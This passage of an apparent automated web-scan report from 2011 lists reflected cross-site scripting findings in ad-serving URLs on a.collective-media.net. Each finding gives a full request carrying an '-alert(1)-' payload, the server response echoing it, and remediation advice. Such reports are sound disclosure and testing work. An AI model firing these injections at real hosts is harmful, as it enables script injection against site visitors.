Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:17 GMT
Connection: close
Content-Length: 7325

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
chAd("ns-62677303_1305034457","http://ad.doubleclick.net/adj/ns.androidcentral/general;net=ns;u=,ns-62677303_1305034457,11f8f328940989e,none,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=3e961'-alert(1)-'4ba879699ea;contx=none;dc=w;btg=ns.i7kt;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1?","0","0",false);</scr'+'ipt>
...[SNIP]...

4.35. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1536c'-alert(1)-'3d68f1b813a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj1536c'-alert(1)-'3d68f1b813a/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;ord1=505344;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:37:05 GMT
Connection: close
Content-Length: 7426

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-7601100_1305034625","http://ad.doubleclick.net/adj1536c'-alert(1)-'3d68f1b813a/ns.androidcentral/general/archive;net=ns;u=,ns-7601100_1305034625,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;o
...[SNIP]...

4.36. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70880'-alert(1)-'374fee92e30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral70880'-alert(1)-'374fee92e30/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;ord1=505344;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:37:06 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-20639338_1305034626","http://ad.doubleclick.net/adj/ns.androidcentral70880'-alert(1)-'374fee92e30/general/archive;net=ns;u=,ns-20639338_1305034626,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=
...[SNIP]...

4.37. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed33f'-alert(1)-'e14152a35ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/generaled33f'-alert(1)-'e14152a35ae/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;ord1=505344;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:37:07 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-82822339_1305034627","http://ad.doubleclick.net/adj/ns.androidcentral/generaled33f'-alert(1)-'e14152a35ae/archive;net=ns;u=,ns-82822339_1305034627,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=itbusmb;
...[SNIP]...

4.38. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d9ed'-alert(1)-'5ddf31af3e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/general/archive4d9ed'-alert(1)-'5ddf31af3e8;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;ord1=505344;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:37:08 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-40396262_1305034628","http://ad.doubleclick.net/adj/ns.androidcentral/general/archive4d9ed'-alert(1)-'5ddf31af3e8;net=ns;u=,ns-40396262_1305034628,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=itbusmb;dc=w;btg
...[SNIP]...

4.39. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e7d'-alert(1)-'94313355a5c was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/general/archive;ppos=60e7d'-alert(1)-'94313355a5c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:36:50 GMT
Connection: close
Content-Length: 7333

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
-53742245_1305034610","http://ad.doubleclick.net/adj/ns.androidcentral/general/archive;net=ns;u=,ns-53742245_1305034610,11f8f328940989e,none,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=60e7d'-alert(1)-'94313355a5c;contx=none;dc=w;btg=ns.i7kt;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1?","0","0",false);</scr'+'ipt>
...[SNIP]...

4.40. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc43f'-alert(1)-'8478e6518a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjbc43f'-alert(1)-'8478e6518a6/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;ord1=877377;cmpgurl=http%253A//www.knowyourmobile.com/features/881740/google_io_what_to_expect.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:39:40 GMT
Connection: close
Content-Length: 7407

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-26189648_1305034780","http://ad.doubleclick.net/adjbc43f'-alert(1)-'8478e6518a6/ns.knowyourmobile/general;net=ns;u=,ns-26189648_1305034780,11f8f328940989e,itdeweb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=2;cmw=nurl;sz=728x90;net=ns;ord1=877377;cont
...[SNIP]...

4.41. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15b2d'-alert(1)-'fe3576fbb9c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. REST URL parameter 2 is the site name (ns.knowyourmobile here); the application should accept only letters, digits, '.', '_' and '-' in it and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside that set) rather than copied verbatim.

Request

GET /cmadj/ns.knowyourmobile15b2d'-alert(1)-'fe3576fbb9c/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;ord1=877377;cmpgurl=http%253A//www.knowyourmobile.com/features/881740/google_io_what_to_expect.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:39:45 GMT
Connection: close
Content-Length: 7407

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-47218449_1305034785","http://ad.doubleclick.net/adj/ns.knowyourmobile15b2d'-alert(1)-'fe3576fbb9c/general;net=ns;u=,ns-47218449_1305034785,11f8f328940989e,itdeweb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=2;cmw=nurl;sz=728x90;net=ns;ord1=877377;contx=itdeweb;dc=w;btg
...[SNIP]...

4.42. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a16af'-alert(1)-'b14a62af70b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. REST URL parameter 3 is the section name (general here); the application should accept only letters, digits, '.', '_' and '-' in it and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside that set) rather than copied verbatim.

Request

GET /cmadj/ns.knowyourmobile/generala16af'-alert(1)-'b14a62af70b;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;ord1=877377;cmpgurl=http%253A//www.knowyourmobile.com/features/881740/google_io_what_to_expect.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:39:48 GMT
Connection: close
Content-Length: 7407

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-13233545_1305034788","http://ad.doubleclick.net/adj/ns.knowyourmobile/generala16af'-alert(1)-'b14a62af70b;net=ns;u=,ns-13233545_1305034788,11f8f328940989e,itdeweb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=2;cmw=nurl;sz=728x90;net=ns;ord1=877377;contx=itdeweb;dc=w;btg=ns.i7kt
...[SNIP]...

4.43. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.knowyourmobile/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88293'-alert(1)-'831d974abd0 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. ppos is a placement flag with a small set of legitimate values (atf here); the application should match it against that fixed list and reject any other request. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside the letters, digits, '.', '_' and '-') rather than copied verbatim.

Request

GET /cmadj/ns.knowyourmobile/general;ppos=88293'-alert(1)-'831d974abd0 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:38:47 GMT
Connection: close
Content-Length: 7325

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
chAd("ns-52450152_1305034727","http://ad.doubleclick.net/adj/ns.knowyourmobile/general;net=ns;u=,ns-52450152_1305034727,11f8f328940989e,none,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=88293'-alert(1)-'831d974abd0;contx=none;dc=w;btg=ns.i7kt;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1?","0","0",false);</scr'+'ipt>
...[SNIP]...

4.44. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.slashgear/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a8a'-alert(1)-'d70f51146c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data inside a script context is inherently dangerous: the value has to be encoded correctly for every layer it passes through, and here it passes through three (a single-quoted JavaScript literal, the HTML that literal is written as, and the DoubleClick ad-call URL inside it), so escaping the outer layer alone still leaves the inner createAndAttachAd("...") string open to a double-quote payload. REST URL parameter 1 is the ad-call type: the response shows cmadj being rewritten to adj with the appended payload carried along, so the handler transforms this segment instead of matching it. It should be matched against the fixed list of supported ad-call types and any other request rejected. A value that cannot be validated this way should be escaped for the JavaScript string context (\xHH for every character outside the letters, digits, '.', '_' and '-') rather than copied verbatim.

Request

GET /cmadjc6a8a'-alert(1)-'d70f51146c9/ns.slashgear/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253;env=ifr;ord1=461219;cmpgurl=http%253A//www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:13 GMT
Connection: close
Content-Length: 7899

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
